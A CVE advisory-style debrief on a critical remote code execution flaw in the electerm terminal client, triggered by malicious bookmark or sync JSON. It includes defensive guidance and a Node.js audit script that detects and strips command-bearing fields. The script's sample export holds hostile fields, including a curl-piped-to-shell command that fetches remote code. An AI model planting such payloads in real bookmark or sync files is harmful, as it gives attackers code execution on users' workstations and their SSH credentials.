PatchSiren cyber security CVE debrief
CVE-2026-45058 electerm CVE debrief
CVE-2026-45058 documents a critical remote code execution vulnerability in electerm, an open-source terminal/SSH/SFTP client. The flaw affects versions 3.8.8 and earlier: maliciously crafted bookmark JSON files, or sync data pulled from a compromised sync target (GitHub Gist or WebDAV), can inject arbitrary commands through exec* fields or global configuration parameters. When a user imports a malicious bookmark or syncs from a compromised source, the injected commands run automatically as soon as the bookmark is opened or the sync data is applied. Exploitation requires user interaction (importing a bookmark file or enabling sync against an attacker-controlled source), but the attacker needs no authentication to electerm to deliver the payload. The CVSS 4.0 vector indicates network attack vector, low attack complexity, no attack prerequisites, and high impact on confidentiality, integrity, and availability for both the vulnerable component and subsequent systems. The vulnerability is classified under several CWE categories: code injection (CWE-94), insufficient verification of data authenticity (CWE-345), download of code without integrity check (CWE-494), and improper control of dynamically-managed code resources (CWE-915).
- Vendor
- electerm
- Product
- Unknown
- CVSS
- CRITICAL 9.4
- CISA KEV
- Not listed in stored evidence
- Original CVE published
- 2026-05-28
- Original CVE updated
- 2026-05-28
- Advisory published
- 2026-05-28
- Advisory updated
- 2026-05-28
Who should care
Organizations and individuals using electerm for remote system administration, particularly those leveraging bookmark sharing or synchronization features across multiple workstations. Security teams managing developer tooling and terminal emulator deployments. Users who import bookmark collections from untrusted sources or rely on cloud-based sync for configuration management.
Technical summary
The vulnerability stems from insufficient validation of bookmark and configuration data imported from external sources. Electerm's bookmark format supports exec* fields that specify commands to run on connection, and global configuration options that change application behavior. In affected versions (3.8.8 and earlier) the application does not verify the integrity or authenticity of imported bookmarks or sync data, so an attacker can craft JSON structures whose command-bearing fields are executed as-is. The attack surface has two primary vectors: (1) social engineering a user into importing a malicious bookmark file, and (2) compromising the external sync target (GitHub Gist or WebDAV server) so that malicious configuration is pulled in on the next sync. When electerm processes the tainted data it passes the unsanitized values to command execution, giving the attacker code execution with the privileges of the electerm process, i.e. the interactive user's account on the workstation, which typically also holds that user's SSH keys and saved credentials. The CVSS 4.0 score of 9.4 reflects the high impact across all security dimensions despite the user interaction required for initial access.
Defensive priority
critical
Recommended defensive actions
- Upgrade electerm to version 3.8.9 or later, which contains the security fix
- Audit all imported bookmark JSON files for unexpected exec*, runScripts, or command fields before importing
- Review and verify the integrity of sync configurations (Gist/WebDAV) before enabling synchronization, and treat the Gist token and WebDAV credentials as secrets: anyone who can write to the sync target can push executable configuration to every workstation that syncs from it
- Disable automatic sync and avoid importing third-party bookmark files if immediate patching is not feasible
- Implement application allow-listing or sandboxing for terminal emulator processes where possible
- Monitor for unexpected child processes spawned by electerm (shells or downloaders launched outside a normal SSH session) that may indicate exploitation
- Validate bookmark files against a known-good schema that excludes command-bearing fields prior to import
- Consider network segmentation for systems running electerm to limit lateral movement if a workstation is compromised
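The technical summary and the audit/schema-validation actions above both come down to the same pre-import check: walk the bookmark export, flag every command-bearing field the advisory names (exec*, runScripts, command) and any unexpected top-level configuration section, and only hand electerm a stripped copy. The following Node.js script is an added example written for this debrief; it is not electerm's own code and does not reproduce electerm's real bookmark schema. The sample export, the field names execCommand and execShell, and the list of allowed top-level keys are all assumptions for illustration. Dropping the prototype-related keys is a general precaution for any JSON that will be merged into application state, not a finding from the advisory.

```javascript
// Added example (not electerm's code): pre-import audit of an electerm-style
// bookmark export. Flags command-bearing fields named in the advisory and
// returns a sanitized copy restricted to a known-good top-level schema.

// Keys the advisory names as command-bearing (exec*, runScripts, command), plus
// prototype-polluting keys dropped as a general precaution (assumption, not a
// finding of the advisory). Case-insensitive so "ExecCommand" is caught too.
const DANGEROUS_KEY = /^(exec.*|runScripts|command|__proto__|constructor|prototype)$/i;

// Top-level sections a bookmark export is allowed to carry. This allow-list is
// an assumption for the example; adjust it to the real export format.
const ALLOWED_TOP_LEVEL = new Set(['bookmarks', 'bookmarkGroups']);

// Recursively collect {path, key, value} for every dangerous key, at any depth.
function findDangerousFields(node, path = '$', out = []) {
  if (Array.isArray(node)) {
    node.forEach((item, i) => findDangerousFields(item, `${path}[${i}]`, out));
  } else if (node !== null && typeof node === 'object') {
    for (const [key, value] of Object.entries(node)) {
      const childPath = `${path}.${key}`;
      if (DANGEROUS_KEY.test(key)) out.push({ path: childPath, key, value });
      findDangerousFields(value, childPath, out);
    }
  }
  return out;
}

// Deep copy with every dangerous key removed. Object.create(null) avoids the
// __proto__ setter on a normal object should a polluting key slip through.
function stripDangerousFields(node) {
  if (Array.isArray(node)) return node.map(stripDangerousFields);
  if (node !== null && typeof node === 'object') {
    const clean = Object.create(null);
    for (const [key, value] of Object.entries(node)) {
      if (DANGEROUS_KEY.test(key)) continue;
      clean[key] = stripDangerousFields(value);
    }
    return clean;
  }
  return node;
}

// Top-level keys outside the allow-list (e.g. a smuggled global config block).
function unexpectedTopLevelKeys(doc) {
  return Object.keys(doc).filter((k) => !ALLOWED_TOP_LEVEL.has(k));
}

// Parse a raw export, report findings, and return a verdict plus a sanitized
// document that contains only allow-listed sections with dangerous keys removed.
function auditBookmarkExport(jsonText) {
  const doc = JSON.parse(jsonText);
  const findings = findDangerousFields(doc);
  const extraKeys = unexpectedTopLevelKeys(doc);
  const sanitized = {};
  for (const key of Object.keys(doc)) {
    if (ALLOWED_TOP_LEVEL.has(key)) sanitized[key] = stripDangerousFields(doc[key]);
  }
  return { safe: findings.length === 0 && extraKeys.length === 0, findings, extraKeys, sanitized };
}

// Constructed sample export: one benign bookmark, one carrying injected
// commands, and a smuggled global config section. Field names are hypothetical.
const SAMPLE_EXPORT = JSON.stringify({
  bookmarks: [
    { id: 'b1', title: 'prod-db', host: '10.0.0.5', port: 22, username: 'ops' },
    {
      id: 'b2', title: 'jump', host: '10.0.0.9', port: 22, username: 'ops',
      execCommand: 'curl http://198.51.100.7/x | sh',   // hypothetical exec* field
      runScripts: [{ script: 'id > /tmp/pwned' }],
    },
  ],
  config: { theme: 'dark', execShell: '/bin/sh -c "touch /tmp/cfg"' },
});

const report = auditBookmarkExport(SAMPLE_EXPORT);
for (const f of report.findings) console.log(`DANGEROUS ${f.path} = ${JSON.stringify(f.value)}`);
for (const k of report.extraKeys) console.log(`UNEXPECTED top-level key: ${k}`);
console.log(report.safe ? 'SAFE to import' : 'BLOCK import; review findings above');
```

Run it against a real export before importing (for instance by replacing SAMPLE_EXPORT with the file contents). Anything flagged is worth reading rather than silently stripping: the audit shows what a malicious export was trying to run, which is useful evidence if the same file or sync source reached other workstations. The same check can be applied to data pulled from a Gist or WebDAV target before it is written into electerm's config.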
Evidence notes
Official GitHub Security Advisory GHSA-jgg9-rw32-44pj, published 2026-05-28, confirms the vulnerability mechanism and affected versions. The NVD record was published the same date with CVSS 4.0 scoring. The CVE is not on the CISA KEV list as of the disclosure date; absence from KEV only means no confirmed exploitation has been catalogued there, not that the bug is unexploited.
Official resources
- CVE-2026-45058 CVE record (CVE.org)
- CVE-2026-45058 NVD detail (NVD)
- Source item URL: nvd_modified
- Source reference: 2026-05-28